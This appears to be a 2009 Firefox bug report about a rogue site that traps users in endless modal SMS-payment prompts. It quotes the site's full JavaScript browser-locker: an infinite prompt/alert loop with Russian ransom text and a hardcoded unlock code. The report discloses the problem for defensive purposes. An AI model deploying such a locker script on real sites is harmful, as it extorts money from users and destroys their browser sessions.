User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Fidofox/0.1 Firefox/3.5.4 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.4) Gecko/20091016 Fidofox/0.1 Firefox/3.5.4 Do not try to visit http://www.tolkoxxx.com/?cat=users unless you have already saved your Firefox session (or unless you are ready to read JavaScript). Expect a lot of JavaScript modal windows unless you pay for an access code or get it from the site's JavaScript source. Reproducible: Always Steps to Reproduce: 1. Visit http://www.tolkoxxx.com/?cat=users 2. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 3. Hit 'Ok' on the alert that says the entered code is wrong. 4. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 5. Hit 'Ok' on the alert that says the entered code is wrong. 6. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 7. Hit 'Ok' on the alert that says the entered code is wrong. 8. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 9. Hit 'Ok' on the alert that says the entered code is wrong. 10. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 11. Hit 'Ok' on the alert that says the entered code is wrong. 12. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 13. Hit 'Ok' on the alert that says the entered code is wrong. 14. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 15. Hit 'Ok' on the alert that says the entered code is wrong. 16. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 17. Hit 'Ok' on the alert that says the entered code is wrong. 18. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 19. Hit 'Ok' on the alert that says the entered code is wrong. 20. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 21. Hit 'Ok' on the alert that says the entered code is wrong. 22. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 23. Hit 'Ok' on the alert that says the entered code is wrong. 24. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 25 Hit 'Ok' on the alert that says the entered code is wrong. 26. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 27 Hit 'Ok' on the alert that says the entered code is wrong. 28. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 29. Hit 'Ok' on the alert that says the entered code is wrong. 30. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 31. Hit 'Ok' on the alert that says the entered code is wrong. 32. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 33. Hit 'Ok' on the alert that says the entered code is wrong. 34. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 35. Hit 'Ok' on the alert that says the entered code is wrong. 36. Hit 'Cancel' on the prompt that asks you to send an SMS and enter its reply as an access code. 37. Hit 'Ok' on the alert that says the entered code is wrong. Actual Results: By clicking a seemingly innocent hyperlink you suddenly enter a rogue site with an endless stream of dialogs (made 100% modal by Firefox 3.5.x). You are not able to close the tab, you are not able to close the window, and thus you loose all of your tabs and windows unless you actually send an expensive SMS to pay your ransom to the rogue site. Well if you are an experienced web developer (like me), you just launch yet another Firefox window and enter view-source:http://www.tolkoxxx.com/?cat=users to view and analyze the following script: <script language='javascript'> oper=0; if (typeof(window.opera)!='undefined') { oper=1 } setTimeout ("Show()",0*1000); function Show() { var p1=''; var p2=''; if (oper==1) { p1="\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";p2="\n\n\n\n"; } for(;;) { var pass_1 = 0; pass_1 = prompt(p2+"Получите неограниченный доступ к сайту:\n\nОтправьте SMS с текстом: AM на номер: 7122 !!!\nАнти-Кризисная Акция: ЦЕНА уменьшена до 5* РУБЛЕЙ."+p1+p1+p1, "Введите пароль"); if(pass_1 != "72356763") { alert(p2+"Неверный пароль!\n\nЧтобы получить пароль:\n\n\nОтправьте SMS с текстом: AM на номер: 7122\n\n\nАнти-Кризисная Акция: ЦЕНА уменьшена до 5* РУБЛЕЙ."+p1+p1+p1); } else { break; } } } </script> You then enter "72356763" (without quotes) as an access code and the nightmare is gone. But obviously the rogues could just use random() and make the whole access code thing a fake. And obviously not anyone can read JavaScript fluently. Expected Results: If the user is forced to see the same alert or prompt for the fifth or tenth time (or well maybe even not quite the same), Firefox should be able to detect something's wrong with the site. Or maybe alerts and prompts should not be so modal or something. I feel uncomfortable about whether this bug should be disclosed to the public, and this I set the "This is a security problem that should be kept confidential until addressed" flag checked, otherwise more clones of the above quoted website may appear. I am not sure about the Product / Component pair responsible, feel free to edit. The severity is critical, because an average user instantly looses his/her data in all open Firefox windows and tabs (if kills the Firefox process), or looses money (if really sends an expensive SMS to the site). This is probably a duplicate of bug 123913 or bug 514111 or both, but I am not 100% sure.

See also bug 520841.

See also bug 61098.

Note on details: I was on the page http://www.clipmuzon.ru/1/%D0%BF%D0%BE%D0%B4%D0%B0%D1%80%D0%B8.html (which seemed like a multimedia archive; I was googling for some song's lyrics) when I was transferred to http://www.tolkoxxx.com/?cat=users (some link must have been auto-activated when I selected some text in the main column). So it's not like I visited an XXX site intentionally; that was an accident. Could happen to anyone.